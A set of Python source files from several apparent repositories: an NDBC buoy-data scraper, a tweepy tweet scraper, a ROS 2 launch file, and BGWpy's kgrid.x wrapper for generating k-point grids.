available['months'] = {}
for month in months:
available['months'][month] = self.historical._available_dtypes_month(month)
return available
def get_realtime(self, dtype):
'''
Get realtime data (last 45 days) for specified data type
Input :
dtype : string representing data type to get data for.
Output :
pandas dataframe with datetime64[ns, UTC] index.
'''
if dtype not in self.realtime.DTYPES:
print("Possible realtime dtypes are: {}".format(list(self.realtime.DTYPES)))
else:
df = self.realtime.scrape_dtype(dtype)
if df.empty:
print("{} not available for buoy {}. Use method 'get_realtime_dtypes' to get available realtime data types for this buoy.".format(dtype, self.buoy_id))
else: return df
def get_historical(self, dtype, year=None, month=None):
'''
Get realtime data (last 45 days) for specified data type
Input :
dtype : string representing data type to get data for.
Up to one of the following (default is all available data):
year : int, optional. Single year to get data for.
month : int in range [1, 12], optional. Single month this year to get data for.
Output :
pandas dataframe with datetime64[ns, UTC] index.
'''
if dtype not in self.historical.DTYPES:
print("Possible historical dtypes are: {}".format(list(self.historical.DTYPES)))
return
if year and month:
raise Exception("Can only provide one of `year` and `month`.")
if year:
df = self.historical.scrape_year(dtype, year)
if df.empty: print("{} for year {} not available for buoy {}. Use method 'get_historical_dtypes(year={})' to get available historical data types for this buoy and year.".format(dtype,year,self.buoy_id,year))
else: return df
elif month:
df = self.historical.scrape_month(dtype, month)
if df.empty: print("{} for month {} not available for buoy {}. Use method 'get_historical_dtypes(month={})' to get available historical data types for this buoy and month.".format(dtype,month,self.buoy_id,month))
else: return df
else:
df = self.historical.scrape_dtype(dtype)
if df.empty: print("{} not available for buoy {}. Use method 'get_historical_dtypes()' to get available historical data types for this buoy.".format(dtype,self.buoy_id))
else: return df
### Saving / Loading methods
def save_realtime(self, dtypes=None):
'''
Saves realtime data as pickled dataframes.
Input :
dtypes : Optional, list of data types to save. Default is all available data types.
'''
self.realtime.scrape_dtypes(dtypes)
def save_historical(self, dtypes=None):
'''
Saves historical data as pickled dataframes.
Input :
dtypes : Optional, list of data types to save. Default is all available data types.
'''
self.historical.scrape_dtypes(dtypes)
def load_realtime(self, dtype, timezone='UTC'):
'''
Loads dataframe that was previously saved with method `save_realtime`
Input :
dtype : string representing data type to load data for.
timezone : string, optional. Timezone to set index to. Default is `UTC`
Output :
pandas dataframe
'''
path = "{}{}/realtime/{}.pkl".format(self.data_dir, self.buoy_id, dtype)
return self._load_dataframe(path, timezone)
def load_historical(self, dtype, timezone='UTC'):
'''
Loads dataframe that was previously saved with method `save_historical`
Input :
dtype : string representing data type to load data for.
timezone : string, optional. Timezone to set index to. Default is `UTC`
Output :
pandas dataframe
'''
path = "{}{}/historical/{}.pkl".format(self.data_dir, self.buoy_id, dtype)
return self._load_dataframe(path, timezone)
def load_data(self, dtype, cols=None, timezone='UTC'):
real, hist = self.load_realtime(dtype, timezone), self.load_historical(dtype, timezone)
both = pd.concat([hist, real], sort=True)
if cols: return both[cols]
else: return both
def _load_dataframe(self, file_path, timezone):
''' Helper method to load a pickled dataframe. '''
try:
data = pd.read_pickle(file_path)
return data.tz_convert(timezone)
except OSError:
print("No pickle at {}".format(file_path))
except Exception:
print("{} is not a valid timezone for pandas DataFrame.tz_convert() method.".format(timezone))
def __repr__(self):
return "Station ID: {}\nStation Name: {}\nLocation: {}, {}\nTime Zone: {}\nOwner: {}\nTtype: {}\nNotes: {}".format(
self.buoy_id, self.metadata['name'], self.metadata['latitude'], self.metadata['longitude'], self.metadata['timezone'],
self.metadata['owner'], self.metadata['ttype'], self.metadata['note']
)
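# Usage sketch. The class definition lies outside this excerpt, so the class
# name (`Buoy` here) and its constructor signature are assumptions:
#   buoy = Buoy('41001')
#   rt = buoy.get_realtime('stdmet')
#   buoy.save_historical(['stdmet'])
#   waves = buoy.load_data('stdmet', cols=['WVHT', 'DPD'])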
```
#### File: buoy/datascrapers/buoy_data_scraper.py
```python
import pandas as pd
import requests # For checking url validity
import os # For saving to data directory
class BuoyDataScraper:
def __init__(self, buoy_id):
self.buoy_id = buoy_id
def _scrape_norm(self, url, headers=[0,1], na_vals=['MM'], date_cols=[0,1,2,3,4], date_format="%Y %m %d %H %M"):
'''
Scrapes data for "normal" data types (all historical after 2006, and realtime dtypes "stdmet", "adcp", "cwind", "supl", "spec").
All of these data types share similar formats, with only differences being the header and NA values.
Inputs :
url : string
the url to scrape data from
headers : list of ints
the row numbers to use as column headers
na_vals : list
values that should be treated as NA
date_cols : list of ints
the columns that are combined into the datetime index
date_format : string
format used to parse the combined date columns
Output :
df : pandas dataframe with datetime index localized to UTC representing the data
'''
# read the data and combine first 5 columns into datetime index
df = pd.read_csv(url, header=headers, delim_whitespace=True, na_values=na_vals, parse_dates={'datetime':date_cols}, index_col=0)
df.index = pd.to_datetime(df.index,format=date_format).tz_localize('UTC')
# remove all headers but first
while df.columns.nlevels > 1:
df.columns = df.columns.droplevel(1)
df.columns.name = 'columns'
return df
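# Example call (the URL is a hypothetical NDBC text file): the first five
# whitespace-delimited columns (year month day hour minute) are folded into
# a UTC datetime index:
#   df = self._scrape_norm('https://www.ndbc.noaa.gov/data/realtime2/41001.txt')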
def _url_valid(self, url):
request = requests.get(url)
return request.status_code == 200
def _create_dir_if_not_exists(self, data_dir):
try: os.makedirs(data_dir)
except FileExistsError: pass
```
#### File: buoy/datascrapers/historical_scraper.py
```python
import pandas as pd
from datetime import datetime
from .buoy_data_scraper import BuoyDataScraper
class HistoricalScraper(BuoyDataScraper):
DTYPES = {"stdmet":{"url_code":"h", "name":"Standard metorological"},
"swden": {"url_code":"w", "name":"Spectral wave density"},
"swdir": {"url_code":"d", "name":"Spectral wave (alpha1) direction"},
"swdir2":{"url_code":"i", "name":"Spectral wave (alpha2) direction"},
"swr1": {"url_code":"j", "name":"Spectral wave (r1) direction"},
"swr2": {"url_code":"k", "name":"Spectral wave (r2) direction"},
"adcp": {"url_code":"a", "name":"Ocean current"},
"cwind": {"url_code":"c", "name":"Continuous winds"},
"ocean": {"url_code":"o", "name":"Oceanographic"},
"dart": {"url_code":"t", "name":"Water column height (Tsunami) (DART)"}
}
BASE_URL_YEAR = "https://www.ndbc.noaa.gov/view_text_file.php?filename={}{}{}.txt.gz&dir=data/historical/{}/"
BASE_URL_MONTH = "https://www.ndbc.noaa.gov/view_text_file.php?filename={}{}{}.txt.gz&dir=data/{}/{}/"
MONTHS = {1: {"name":"Jan", "url_code":1},
2: {"name":"Feb", "url_code":2},
3: {"name":"Mar", "url_code":3},
4: {"name":"Apr", "url_code":4},
5: {"name":"May", "url_code":5},
6: {"name":"Jun", "url_code":6},
7: {"name":"Jul", "url_code":7},
8: {"name":"Aug", "url_code":8},
9: {"name":"Sep", "url_code":9},
10:{"name":"Oct", "url_code":'a'},
11:{"name":"Nov", "url_code":'b'},
12:{"name":"Dec", "url_code":'c'}
}
MIN_YEAR = 2007
def __init__(self, buoy_id, data_dir="buoydata/"):
super().__init__(buoy_id)
self.data_dir = "{}{}/historical/".format(data_dir, buoy_id)
def scrape_dtypes(self, dtypes=None):
'''
Scrapes and saves all known historical data for this buoy.
Input :
dtypes : Optional, list of dtype strings. Default is all available dtypes.
Notes : * If self.data_dir doesn't exist, it will be created.
* Existing files will be overwritten.
'''
if not dtypes: dtypes=self.DTYPES
for dtype in dtypes:
self.scrape_dtype(dtype, save=True)
def scrape_dtype(self, dtype, save=False):
'''
Scrapes and optionally saves all historical data for a given dtype.
Input :
dtype : string, must be an available data type for this buoy
save : bool, default False. If True, saves the dataframe as a pickle in self.data_dir instead of returning it.
Output :
pandas dataframe if save is False; otherwise the pickled dataframe is written to self.data_dir.
Notes : * If self.data_dir doesn't exist, it will be created.
* If save is True, an existing pickle file will be overwritten.
'''
df = pd.DataFrame()
for year in range(self.MIN_YEAR, datetime.now().year):
data = self.scrape_year(dtype, year)
if not data.empty:
if df.empty: df = data
else: df = pd.concat([df, data])
for month in range(1, datetime.now().month):
data = self.scrape_month(dtype, month)
if not data.empty:
if df.empty: df = data
else: df = pd.concat([df, data])
if not df.empty and save:
self._create_dir_if_not_exists(self.data_dir)
path = "{}{}.pkl".format(self.data_dir, dtype)
df.to_pickle(path)
print("Saved data to {}".format(path))
else:
return df
def scrape_year(self, dtype, year):
'''
Scrapes data for a given dtype and year. Calls helper function to scrape specific dtype.
See helper functions below for columns and units of each dtype.
More info at: https://www.ndbc.noaa.gov/measdes.shtml
Input :
dtype : string, must be an available data type for this buoy
year : int, from self.MIN_YEAR (2007) up to, but not including, the current year.
Output :
pandas dataframe.
'''
if year < self.MIN_YEAR:
raise ValueError("Minimum year is {}".format(self.MIN_YEAR))
url = self._make_url_year(dtype, year)
df = pd.DataFrame()
if self._url_valid(url):
df = getattr(self, dtype)(url)
return df
def scrape_month(self, dtype, month):
'''
Scrapes data for a given dtype and month. Calls helper function to scrape specific dtype.
See helper functions below for columns and units of each dtype.
More info at: https://www.ndbc.noaa.gov/measdes.shtml
Input :
dtype : string, must be an available data type for this buoy
month : int in range [1, current month), i.e. a completed month of the current year.
Output :
pandas dataframe.
Note: Data for most recent month may not yet be available.
'''
url = self._make_url_month(dtype, month)
df = pd.DataFrame()
if self._url_valid(url):
df = getattr(self, dtype)(url)
return df
def stdmet(self, url):
'''
Standard Meteorological Data
dtype: "stdmet"
index: datetime64[ns, UTC]
columns: WDIR WSPD GST WVHT DPD APD MWD PRES ATMP WTMP DEWP VIS PTDY TIDE
units: degT m/s m/s m sec sec degT hPa degC degC degC nmi hPa ft
'''
NA_VALS = ['MM', 99., 999.]
df = self._scrape_norm(url, na_vals=NA_VALS)
df.columns.name = 'columns'
return df
def swden(self, url):
'''
Spectral wave density
dtype: "swden"
index: datetime64[ns, UTC]
columns: .0200 .0325 .0375 ... .4450 .4650 .4850 (frequencies in Hz)
units: Spectral Wave Density/Energy in m^2/Hz for each frequency bin
'''
NA_VALS = ['MM']
df = self._scrape_norm(url, na_vals=NA_VALS)
df.columns.name = 'frequencies'
return df
def swdir(self, url):
'''
Spectral Wave Data (alpha1, mean wave direction)
dtype: "swdir"
index: datetime64[ns, UTC]
columns: 0.033 0.038 0.043 ... 0.445 0.465 0.485 (frequencies in Hz)
units: direction (in degrees from true North, clockwise) for each frequency bin.
'''
NA_VALS = ['MM', 999.]
df = self._scrape_norm(url, na_vals=NA_VALS)
df.columns.name = 'frequencies'
return df.astype('float')
def swdir2(self, url):
'''
Spectral Wave Data (alpha2, principal wave direction)
dtype: "swdir2"
index: datetime64[ns, UTC]
columns: 0.033 0.038 0.043 ... 0.445 0.465 0.485 (frequencies in Hz)
units: direction (in degrees from true North, clockwise) for each frequency bin.
'''
NA_VALS= ['MM', 999.]
df = self._scrape_norm(url, na_vals=NA_VALS)
df.columns.name = 'frequencies'
return df.astype('float')
def swr1(self, url):
'''
Spectral Wave Data (r1, directional spreading for alpha1)
dtype: "swr1"
index: datetime64[ns, UTC]
columns: 0.033 0.038 0.043 ... 0.445 0.465 0.485 (frequencies in Hz)
units: Ratio (between 0 and 100) describing the spreading about the main direction.
Note: r1 and r2 historical values are scaled by 100.
Units are hundredths, so they are multiplied by 0.01 here.
'''
NA_VALS, FACTOR = ['MM', 999.], 0.01
df = self._scrape_norm(url, na_vals=NA_VALS)
df.columns.name = 'frequencies'
df[df.select_dtypes(include=['number']).columns] *= FACTOR
return df
def swr2(self, url):
'''
Spectral Wave Data (r2, directional spreading for alpha2)
dtype: "swr2"
index: datetime64[ns, UTC]
columns: 0.033 0.038 0.043 ... 0.445 0.465 0.485 (frequencies in Hz)
units: Ratio (between 0 and 100) describing the spreading about the main direction.
Note: r1 and r2 historical values are scaled by 100.
Units are hundredths, so they are multiplied by 0.01 here.
'''
NA_VALS, FACTOR = ['MM', 999.], 0.01
df = self._scrape_norm(url, na_vals=NA_VALS)
df.columns.name = 'frequencies'
df[df.select_dtypes(include=['number']).columns] *= FACTOR
return df
def adcp(self, url):
'''
Acoustic Doppler Current Profiler Data
dtype: "adcp"
index: datetime64[ns, UTC]
columns: DEP01 DIR01 SPD01
units: m degT cm/s
'''
NA_VALS = ['MM']
df = self._scrape_norm(url, na_vals=NA_VALS)
return df.iloc[:,0:3].astype('float')
def cwind(self, url):
'''
Continuous Winds Data
dtype: "cwind"
index: datetime64[ns, UTC]
columns: WDIR WSPD GDR GST GTIME
units: degT m/s degT m/s hhmm
'''
NA_VALS = ['MM', 99., 999., 9999.]
df = self._scrape_norm(url, na_vals=NA_VALS)
return df
def ocean(self, url):
'''
Oceanographic Data
dtype: "ocean"
index: datetime64[ns, UTC]
columns: DEPTH OTMP COND SAL O2% O2PPM CLCON TURB PH EH
units: m degC mS/cm psu % ppm ug/l FTU - mv
'''
NA_VALS = ['MM', 99., 999.]
return self._scrape_norm(url, na_vals=NA_VALS)
def dart(self, url):
'''
Water column height (Tsunami) (DART)
dtype: "dart"
index: datetime64[ns, UTC]
columns: T HEIGHT
units: enum (measurement type) m (height of water column)
* 1 = 15-minute
* 2 = 1-minute
* 3 = 15-second
Notes : * See Tsunami detection algorithm here: https://www.ndbc.noaa.gov/dart/algorithm.shtml
'''
NA_VALS, DATE_COLS, DATE_FORMAT = ['MM', 9999.], [0,1,2,3,4,5], "%Y %m %d %H %M %S"
return self._scrape_norm(url, na_vals=NA_VALS, date_cols=DATE_COLS, date_format=DATE_FORMAT)
def _available_dtypes_year(self, year):
'''Returns list of available data types for a given year.'''
available_types = []
for dtype in self.DTYPES:
if self._url_valid(self._make_url_year(dtype, year)):
available_types.append(dtype)
return available_types
def _available_dtypes_month(self, month):
'''Returns list of available data types for a given month.'''
available_types = []
for dtype in self.DTYPES:
if self._url_valid(self._make_url_month(dtype, month)):
available_types.append(dtype)
return available_types
def _available_years(self, dtype):
'''Returns list of available years for a given data type.'''
available_years = []
for year in range(self.MIN_YEAR, datetime.now().year):
if self._url_valid(self._make_url_year(dtype, year)):
available_years.append(year)
return available_years
def _available_months(self, dtype):
'''Returns list of available months for a given data type.'''
available_months = []
for month in range(1, datetime.now().month):
if self._url_valid(self._make_url_month(dtype, month)):
available_months.append(month)
return available_months
def _make_url_year(self, dtype, year):
'''Makes a url for a given data type and year.'''
return self.BASE_URL_YEAR.format(self.buoy_id, self.DTYPES[dtype]["url_code"], year, dtype)
def _make_url_month(self, dtype, month):
'''Makes a url for a given data type and month.'''
return self.BASE_URL_MONTH.format(self.buoy_id, self.MONTHS[month]["url_code"], datetime.now().year, dtype, self.MONTHS[month]["name"])
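# Example of the URLs these helpers build, for a buoy with id '41001':
#   _make_url_year('stdmet', 2018) ->
#     https://www.ndbc.noaa.gov/view_text_file.php?filename=41001h2018.txt.gz&dir=data/historical/stdmet/
#   _make_url_month('stdmet', 10), run during 2019 ->
#     https://www.ndbc.noaa.gov/view_text_file.php?filename=41001a2019.txt.gz&dir=data/stdmet/Oct/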
``` |
{
"source": "JonahGoot/TwitterSkynet",
"score": 3
} |
#### File: JonahGoot/TwitterSkynet/tweetscrape.py
```python
import json
import csv
import tweepy
import re
Ckeys = []
with open('ScanKeys.txt', 'r', encoding='utf-8') as f:
keys = f.readlines()
for key in keys:
key = key.replace('\n', "")
a,b = key.split(" ", 1)
Ckeys.append(b)
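# ScanKeys.txt is expected to hold one "label key" pair per line; the labels
# are ignored and only the order matters. Illustrative layout (values are
# placeholders, not real credentials):
#   consumer_key XXXX
#   consumer_key_secret XXXX
#   bearer_token XXXX
#   access_token XXXX
#   access_token_secret XXXX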
consumer_key = Ckeys[0]
consumer_key_secret = Ckeys[1]
bearer_token = Ckeys[2]
access_token = Ckeys[3]
access_token_secret = Ckeys[4]
#create authentication for accessing Twitter
auth = tweepy.OAuthHandler(consumer_key, consumer_key_secret)
auth.set_access_token(access_token, access_token_secret)
#initialize Tweepy API
api = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)
def main():
with open('ProfilesToScrape.txt', 'r', encoding='utf-8') as f:
lines = f.readlines()
print("Extracting tweets from " + str(len(lines)) + " profiles:")
for line in lines:
line = line.replace('\n', "")
print(line)
line = ScrapeInstance(line)
line.createfile()
line.ScrapeIntoFile()
class ScrapeInstance:
def __init__(self, name):
self.name = name
self.f = None
def createfile(self):
filename = "tweetdata" + self.name + ".txt"
self.f = open(filename, "w", encoding='utf-8')
def ScrapeIntoFile(self):
for tweet in tweepy.Cursor(api.user_timeline,id=self.name, tweet_mode='extended', include_rts=False).items():
text = tweet.full_text
self.f.write(text.replace('\n',' ').replace('&', '') + ('\n'))
self.f.close()
if __name__ == "__main__":
main()
#JoeBiden = ScrapeInstance("JoeBiden")
#JoeBiden.createfile()
#JoeBiden.ScrapeIntoFile()
``` |
{
"source": "jonah-gourlay44/gym2real",
"score": 2
} |
#### File: controller/launch/controller.launch.py
```python
from launch import LaunchDescription
from launch_ros.actions import Node
def generate_launch_description():
return LaunchDescription([
Node(
package='controller',
executable='controller',
name='controller',
)
])
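# With the workspace sourced and the `controller` package built, this launch
# file can be run with the standard ROS 2 CLI:
#   ros2 launch controller controller.launch.py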
``` |
{
"source": "JonahGroendal/Python-Data-Schema",
"score": 3
} |
#### File: JonahGroendal/Python-Data-Schema/python_data_schema.py
```python
__author__ = "<NAME>"
#################################
# Decorators for and_() and or_()
#################################
def canonicalize_args(if_dict):
'Decorator that canonicalizes *args into a list of validators (functions that take one argument and return a boolean)'
def decorator(func):
def wrapper(*args):
if type_is_(dict)(args[0]):
args = if_dict(args[0])
elif type_is_(list)(args[0]):
args = args[0]
else:
args = list(args)
return func(args)
return wrapper
return decorator
# {key : value} are {validator generator : validator generator argument}
# key(value) returns a validator
def eval_function_argument_pairs(func_arg_pairs):
return [k(v) for k,v in func_arg_pairs.items()]
# {key : value} are {validator for key : validator for value} (not validator generators!)
def translate_shorthand_syntax(key_value_validators):
args = []
for key_validator, value_validator in key_value_validators.items():
if or_(type_is_(str), type_is_(int))(key_validator):
key_validator = equals_(key_validator)
args.append(and_(key_(key_validator), value_(value_validator)))
return args
###########################################################
# Validator generators (Each returns a validator function)
###########################################################
def is_(value):
def validator(data):
return data is value
return validator
def equals_(value):
def validator(data):
return data == value
return validator
def greater_than_(value):
def validator(data):
return data > value
return validator
def less_than_(value):
def validator(data):
return data < value
return validator
@canonicalize_args(if_dict=eval_function_argument_pairs)
def and_(validators):
'ands together validators'
def validator(data):
for val in validators:
if not val(data):
return False
return True
return validator
@canonicalize_args(if_dict=translate_shorthand_syntax)
def or_(validators):
'ors together validators'
def validator(data):
for val in validators:
if val(data):
return True
return False
return validator
def for_each_item_(element_validator):
'for each item in data (list or dict)'
def validator(list_or_dict_data):
if type_is_(dict)(list_or_dict_data):
list_or_dict_data = list_or_dict_data.items()
return all(map(element_validator, list_or_dict_data))
return validator
# Predefined example of how to use data_()
def type_is_(value):
return data_(type)(is_(value))
##########################################################################
# Validator data modifiers (modifies data before it's passed to validator)
##########################################################################
def data_(data_modifier):
def wrapper(validation_func):
def validator(data):
return validation_func(data_modifier(data))
return validator
return wrapper
def key_(validation_func):
return data_(atIndex(0))(validation_func)
def value_(validation_func):
return data_(atIndex(1))(validation_func)
##########################################
# data_modifier funcs for use with data_()
##########################################
def atIndex(i):
return lambda data: data[i]
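# Usage sketch built only from the functions above -- validates that every
# item of a dict matches one of the allowed key/value pairs:
#   person = for_each_item_(or_({
#       'name': type_is_(str),
#       'age':  and_(type_is_(int), greater_than_(0)),
#   }))
#   person({'name': 'Ada', 'age': 36})   # True
#   person({'name': 'Ada', 'age': -1})   # False (age fails greater_than_(0))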
``` |
{
"source": "jonahhaber/BGWpy",
"score": 2
} |
#### File: BGWpy/BGW/kgrid.py
```python
import os
import subprocess
import numpy as np
from ..core import fortran_str
from ..core import Task
__all__ = ['get_kpt_grid', 'get_kgrid_input', 'get_kpoints', 'get_kqshift',
'get_kpt_grid_nosym', 'KgridTask']
class KgridTask(Task):
def __init__(self,
structure,
ngkpt = 3*[1],
kshift = 3*[.0],
qshift = 3*[.0],
fft = 3*[0],
use_tr=False,
executable='kgrid.x', # TODO remove executable and make bindir a global option
rootname='tmp.kgrid',
clean_after=True,
dirname='',
**kwargs):
"""
Arguments
---------
structure : pymatgen.Structure
Structure object containing information on the unit cell.
ngkpt : list(3), int, optional
K-points grid. Number of k-points along each primitive vector
of the reciprocal lattice.
kshift : list(3), float, optional
Relative shift of the k-points grid along each direction,
as a fraction of the smallest division along that direction.
qshift : list(3), float, optional
Absolute shift of the k-points grid along each direction.
fft : list(3), int, optional
Number of points along each direction of the fft grid.
use_tr : bool
Use time reversal symmetry.
"""
rootname = os.path.join(dirname, rootname)
self.dirname = os.path.dirname(rootname)
self.inputname = rootname + '.in'
self.outputname = rootname + '.out'
self.logname = rootname + '.log'
self.executable = executable
self.clean_after = clean_after
self.structure = structure
self.ngkpt = np.array(ngkpt)
self.kshift = np.array(kshift)
self.qshift = np.array(qshift)
self.fft = fft
self.use_tr = use_tr
def read_kpoints(self):
"""Read a list of kpoints and their weights from kgrid.x output file."""
with open(self.outputname, 'r') as f:
content = f.read()
lines = content.splitlines()[2:]
kpoints = list()
weights = list()
for line in lines:
k = [ float(ki) for ki in line.split()[:3] ]
w = float(line.split()[-1])
kpoints.append(k)
weights.append(w)
return kpoints, weights
@property
def new_dir(self):
return self.dirname and not os.path.exists(self.dirname)
def write(self):
if self.new_dir:
subprocess.call(['mkdir', '-p', self.dirname])
with open(self.inputname, 'w') as f:
f.write(self.get_kgrid_input())
def run(self):
try:
subprocess.call([self.executable, self.inputname,
self.outputname, self.logname])
except OSError as E:
message = (str(E) + '\n\n' +
79 * '=' + '\n\n' +
'Could not find the executable kgrid.x\n' +
'Please make sure it is available for execution.\n' +
'On a computing cluster, you might do this by loading the module:\n' +
' module load berkeleygw\n' +
"If you compiled BerkeleyGW yourself, " +
"make sure that the 'bin' directory\n" +
'of BerkeleyGW is listed in your PATH environment variable.\n' +
'\n' + 79 * '=' + '\n')
raise OSError(message)
def clean_up(self):
"""Remove all temporary files (input, output log)."""
for fname in (self.inputname, self.outputname, self.logname):
if os.path.exists(fname):
try:
os.remove(fname)
except Exception as E:
print(E)
if self.new_dir:
try:
os.removedirs(self.dirname)
except Exception as E:
print(E)
def get_kgrid_input(self):
"""Make a kgrid.x input, using pymatgen.Structure object."""
structure = self.structure
kshift = self.kshift
qshift = self.qshift
ngkpt = self.ngkpt
fft = self.fft
use_tr = self.use_tr
abc = np.array(structure.lattice.abc)
latt_vec_rel = (structure.lattice.matrix.transpose() / abc).transpose().round(12)
pos_cart_rel = np.dot(structure.frac_coords, latt_vec_rel).round(6)
S = ''
for arr in (ngkpt, kshift, qshift):
S += fortran_str(arr) + '\n'
S += '\n'
for arr in latt_vec_rel.tolist() + [structure.num_sites]:
S += fortran_str(arr) + '\n'
for Z, pos in zip(structure.atomic_numbers, pos_cart_rel):
S += str(Z) + ' ' + fortran_str(pos) + '\n'
for arr in (fft, use_tr):
S += fortran_str(arr) + '\n'
return S
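# The generated input is plain text: one line each for ngkpt, kshift and
# qshift, a blank line, the normalized lattice vectors, the atom count,
# one "Z x y z" line per atom, then the fft grid and the time-reversal flag.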
@staticmethod
def get_kqshift(ngkpt, kshift, qshift):
"""Add an absolute qshift to a relative kshift."""
kqshiftk = [ kshift[i] + qshift[i] * ngkpt[i] for i in range(3) ]
return kqshiftk
def get_kpt_grid_nosym(self):
"""
Return a list of kpoints generated without any symmetry,
along with their weights.
"""
ngkpt = self.ngkpt
kshift = self.kshift
qshift = self.qshift
nkx, nky, nkz = ngkpt
kpoints = list()
weights = list()
for ikx in range(nkx):
for iky in range(nky):
for ikz in range(nkz):
k = (np.array([ikx, iky, ikz]) + kshift) / ngkpt + qshift
kpoints.append(k)
weights.append(1.)
return np.array(kpoints), np.array(weights)
def read_symmetries(self):
"""Read the symmetries matrices and translation vectors."""
with open(self.logname, 'r') as f:
while True:
try:
line = next(f)
if 'symmetries of the crystal without FFT grid' in line:
line = next(f)
nsym = int(line)
line = next(f)
assert 'Space group' in line
syms = np.zeros((nsym, 9), dtype=int)
taus = np.zeros((nsym, 3), dtype=float)
for i in range(nsym):
line = next(f)
parts = line.split()
syms[i,:] = [int(v) for v in parts[2:11]]
taus[i,:] = [float(v) for v in parts[11:14]]
break
except StopIteration:
break
except ValueError as e:
raise Exception('Could not parse kgrid file.\n\n' + str(e))
return syms, taus
def get_kpoints(self):
"""Write, run and extract kpoints. Return kpt, wtk."""
try:
self.write()
self.run()
return self.read_kpoints()
finally:
if self.clean_after:
self.clean_up()
def get_symmetries(self):
"""Write, run and extract symmetries."""
try:
self.write()
self.run()
return self.read_symmetries()
finally:
if self.clean_after:
self.clean_up()
def get_kpoints_and_sym(self):
"""Write, run and extract kpoints and symmetries."""
try:
self.write()
self.run()
outkpt = self.read_kpoints()
outsym = self.read_symmetries()
return outkpt, outsym
finally:
if self.clean_after:
self.clean_up()
# =========================================================================== #
""" Constructor functions """
def get_kpt_grid(structure, ngkpt,
executable='kgrid.x', # TODO remove executable and make bindir a global option
rootname='tmp.kgrid', clean_after=True, **kwargs):
"""
Use kgrid.x to compute the list of kpoint and their weight.
Arguments
---------
structure: pymatgen.Structure
The cell definition of the system.
ngkpt: array(3)
The k-point grid.
executable: str
The path to kgrid.x
rootname: str
Base name for the temporary files; its directory part determines where the files are written.
clean_after: bool
Remove files afterward.
Keyword Arguments
-----------------
Any other argument to pass to get_kgrid_input, including:
kshift:
A k-point shift (relative to the grid spacing).
qshift:
A q-point shift (absolute, in reduced coord.)
Returns
-------
kpts: A list of k-points (as a 2D list).
wtks: A list of weights.
"""
dirname = os.path.dirname(rootname)
new_dir = dirname and not os.path.exists(dirname)
inputname = rootname + '.in'
outputname = rootname + '.out'
logname = rootname + '.log'
inputcontent = get_kgrid_input(structure, ngkpt, **kwargs)
# Write the input
if new_dir:
#os.system('mkdir -p ' + dirname)
subprocess.call(['mkdir', '-p', dirname])
with open(inputname, 'w') as f:
f.write(inputcontent)
# Run kgrid.x
try:
subprocess.call([executable, inputname, outputname, logname])
except OSError as E:
message = (str(E) + '\n\n' +
79 * '=' + '\n\n' +
'Could not find the executable {} .\n'.format(executable) +
'Please make sure it is available for execution.\n' +
'On a computing cluster, you might do this by loading the module:\n' +
' module load berkeleygw\n' +
"If you compiled BerkeleyGW yourself, " +
"make sure that the 'bin' directory\n" +
'of BerkeleyGW is listed in your PATH environment variable.\n' +
'\n' + 79 * '=' + '\n')
raise OSError(message)
# Read the output
with open(outputname, 'r') as f:
outputcontent = f.read()
# Clean up
if clean_after:
for fname in (inputname, outputname, logname):
if os.path.exists(fname):
try:
os.remove(fname)
except Exception as E:
print(E)
if new_dir:
try:
os.removedirs(dirname)
except Exception as E:
print(E)
# Parse the output
return get_kpoints(outputcontent)
def get_kgrid_input(structure, ngkpt, kshift=[.0,.0,.0], qshift=[.0,.0,.0],
fft=[0,0,0], use_tr=False, **kwargs):
"""Make a kgrid.x input, using pymatgen.Structure object."""
abc = np.array(structure.lattice.abc)
latt_vec_rel = (structure.lattice.matrix.transpose() / abc).transpose().round(12)
pos_cart_rel = np.dot(structure.frac_coords, latt_vec_rel).round(6)
S = ''
for arr in (ngkpt, kshift, qshift):
S += fortran_str(arr) + '\n'
S += '\n'
for arr in latt_vec_rel.tolist() + [structure.num_sites]:
S += fortran_str(arr) + '\n'
for Z, pos in zip(structure.atomic_numbers, pos_cart_rel):
S += str(Z) + ' ' + fortran_str(pos) + '\n'
for arr in (fft, use_tr):
S += fortran_str(arr) + '\n'
return S
def get_kpoints(content):
"""Read a list of kpoints and their weights from kgrid.x output file."""
lines = content.splitlines()[2:]
kpoints = list()
weights = list()
for line in lines:
k = [ float(ki) for ki in line.split()[:3] ]
w = float(line.split()[-1])
kpoints.append(k)
weights.append(w)
return kpoints, weights
def get_kqshift(ngkpt, kshift, qshift):
"""Add an absolute qshift to a relative kshift."""
kqshiftk = [ kshift[i] + qshift[i] * ngkpt[i] for i in range(3) ]
return kqshiftk
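# Worked example: with ngkpt=[4, 4, 4], kshift=[.5, .5, .5] and
# qshift=[0, 0, .001], get_kqshift returns [0.5, 0.5, 0.504],
# since 0.5 + 0.001 * 4 = 0.504.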
# ============================================================== #
def get_kpt_grid_nosym(ngkpt, kshift=[.0,.0,.0], qshift=[.0,.0,.0]):
"""
Return a list of kpoints generated without any symmetry,
along with their weights.
"""
ngkpt = np.array(ngkpt)
kshift = np.array(kshift)
qshift = np.array(qshift)
nkx, nky, nkz = ngkpt
kpoints = list()
weights = list()
#for ikx in range(-nkx, nkx):
# for iky in range(-nky, nky):
# for ikz in range(-nkz, nkz):
# k = (np.array([ikx, iky, ikz]) + kshift) / ngkpt * .5 + qshift
# kpoints.append(k)
# weights.append(1.)
for ikx in range(nkx):
for iky in range(nky):
for ikz in range(nkz):
k = (np.array([ikx, iky, ikz]) + kshift) / ngkpt + qshift
kpoints.append(k)
weights.append(1.)
return np.array(kpoints), np.array(weights)
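# Example: get_kpt_grid_nosym([2, 1, 1]) returns the two points
# [0, 0, 0] and [0.5, 0, 0], each with weight 1.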
``` |